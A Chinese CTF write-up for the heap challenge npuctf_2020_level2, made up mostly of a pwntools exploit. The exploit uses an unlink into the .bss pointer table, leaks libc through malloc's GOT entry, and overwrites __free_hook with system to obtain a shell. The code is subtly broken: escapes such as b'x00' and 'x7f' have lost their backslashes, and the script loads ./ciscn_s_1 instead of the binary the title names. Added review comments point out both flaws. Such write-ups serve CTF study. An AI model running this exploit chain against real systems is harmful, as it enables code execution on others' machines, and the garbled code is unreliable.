寒假训练 npuctf_2020_level2(9/250)将heap分配到bss上,从而满足程序条件

一开始忘记注意bss段上的heap与key1和key2的偏移了,所以有点蒙蔽不知道怎么写,然后看了pwnki师傅博客的一点提醒,恍然大悟

思路

  1. 通过unlink把指针的值分配到bss段上,从而控制heap里的指针值,再然后将key2和key1修改值,为自己可用
  2. 接着劫持free_hook即可getshell

exp

from pwn import *

#p=process('./ciscn_s_1')
# Remote target used in the write-up (the commented process() line above is the local variant).
# NOTE(review): the page title names npuctf_2020_level2, but the binary and libc loaded
# here are './ciscn_s_1' and '../libc-2.27.so' — confirm which challenge this script is for.
p=remote('node3.buuoj.cn',29220)
elf=ELF('./ciscn_s_1')
# libc-2.27: the later __free_hook step depends on this specific glibc generation.
libc=ELF('../libc-2.27.so')
context.log_level='debug'
def add(idx,size,content):
    """Drive menu item 1 (allocation, judging by the helper's name and prompts).

    Answers the menu prompt with '1', then the 'index:', 'size:' and
    'content:' prompts with `idx`, `size` and `content` respectively.
    Uses the module-level connection `p`; returns nothing.
    """
    dialogue = (
        ('4.show', '1'),
        ('index:', str(idx)),
        ('size:', str(size)),
        ('content:', content),
    )
    for prompt, answer in dialogue:
        p.sendafter(prompt, answer)
 
def free(idx):
    """Drive menu item 2 (free, judging by the helper's name) for slot `idx`.

    Uses the module-level connection `p`; returns nothing.
    """
    dialogue = (('4.show', '2'), ('index:', str(idx)))
    for prompt, answer in dialogue:
        p.sendafter(prompt, answer)
 
def edit(idx,content):
    """Drive menu item 3 (edit, judging by the helper's name): rewrite slot `idx` with `content`.

    Uses the module-level connection `p`; returns nothing.
    """
    dialogue = (
        ('4.show', '3'),
        ('index:', str(idx)),
        ('content:', content),
    )
    for prompt, answer in dialogue:
        p.sendafter(prompt, answer)

def show(idx):
    """Drive menu item 4 (show) for slot `idx`.

    Unlike the other helpers this one waits for 'show' / 'index:' and
    replies with sendline, leaving the program's answer in the receive
    buffer for the caller to parse. Uses the module-level connection `p`.
    """
    p.sendlineafter('show', '4')
    p.sendlineafter('index:', str(idx))


# Address of the program's chunk-pointer table in .bss. This is the write-up's key
# point: the unlink target is this .bss array, so `heap+N*8` below indexes table slot N.
heap=0x6020E0
#0x6022B8
# Seven filler chunks of 0xf8 bytes; they are freed again in the loop below, before the unlink.
for i in range(1,8):
    add(i,0xf8,'pppp')

# Slots 32 and 9 are the two 0xf8 chunks involved in the unlink; 31 and 30 are smaller
# chunks allocated after them.
add(32,0xf8,'pppp')
add(9,0xf8,'pppp')
add(31,0x80,'pppp')
add(30,0x80,'pppp')
for i in range(1,8):
    free(i)

# Step 1 of the write-up (unlink): slot 32 is rewritten with a fake chunk header whose
# fd/bk point at slot 32's own table entry (heap+32*8 minus 0x18 / 0x10), followed by a
# prev_size for the next chunk; free(9) then triggers the unlink.
# NOTE(review): b'x00' is three bytes, and bytes.ljust() requires a single-byte fill;
# this reads like '\x00' with the backslash lost in rendering (likewise 'x7f' below).
edit(32,(p64(0)+p64(0xf1)+p64(heap+32*8-0x18)+p64(heap+32*8-0x10)).ljust(0xf0,b'x00')+p64(0xf0))
free(9)

# Slot 32 now points into the table itself, so editing slot 32 rewrites table entries:
# slot 29 -> malloc@GOT for the leak. The trailing p32(999)+p32(999) presumably set the
# key1/key2 values the write-up mentions — TODO confirm their offset from `heap`.
edit(32,(p64(elf.got['malloc'])+p64(heap+29*8)+p64(heap+29*8)+p64(heap+29*8)).ljust(0xf0,b'x00')+p32(999)+p32(999))
show(29)
# Leak: take the last six bytes of the printed libc pointer and subtract malloc's offset.
libc.address=u64(p.recvuntil('x7f')[-6:].ljust(8,b'x00'))-libc.symbols['malloc']
free_hook=libc.symbols['__free_hook']
system=libc.symbols['system']
print(hex(libc.address))
print(hex(free_hook))
# Step 2 of the write-up: point the table entries at __free_hook, write system there,
# then free a chunk holding '/bin/sh'.
# NOTE: __free_hook exists only up to glibc 2.33 (removed in 2.34), so this step is
# tied to the libc-2.27 loaded above.
edit(32,p64(free_hook)*4)
edit(32,p64(system))
add(15,0x80,'/bin/sh')
free(15)
#gdb.attach(p)
p.interactive()
原文地址:https://www.cnblogs.com/pppyyyzzz/p/14300429.html